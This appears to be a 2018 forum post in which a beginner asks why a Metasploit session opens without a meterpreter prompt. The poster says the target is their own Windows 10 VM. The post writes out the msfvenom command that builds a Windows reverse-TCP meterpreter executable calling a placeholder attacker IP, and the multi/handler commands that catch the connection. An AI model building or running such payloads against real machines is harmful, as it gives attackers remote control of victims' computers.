aideux Posted June 4, 2018 Share Posted June 4, 2018 For some reason, I keep getting an issue where, when the victim double-clicks on the payload, a session is opened, but not the console that would allow me to use meterpreter. To create the payload, I use this code: msfvenom -p windows/meterpreter_reverse_tcp --platform windows -a x86 -f exe LHOST=[attacker IP address] LPORT=5555 -o /root/Desktop/[filename].exe Then, in the metasploit console, I type: use multi/handler set payload windows/meterpreter_reverse_tcp set LHOST [attacker IP address] set LPORT 5555 exploit Then, a session is opened, but the line that looks like "meterpreter>" does not open. I have tried using different ports, and have also attempted to use ngrok, which did not work. The system I am attacking is my own windows 10 VM. Can someone please help me out? I am new to using metasploit, and would love some advice. Quote Link to comment Share on other sites More sharing options...
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.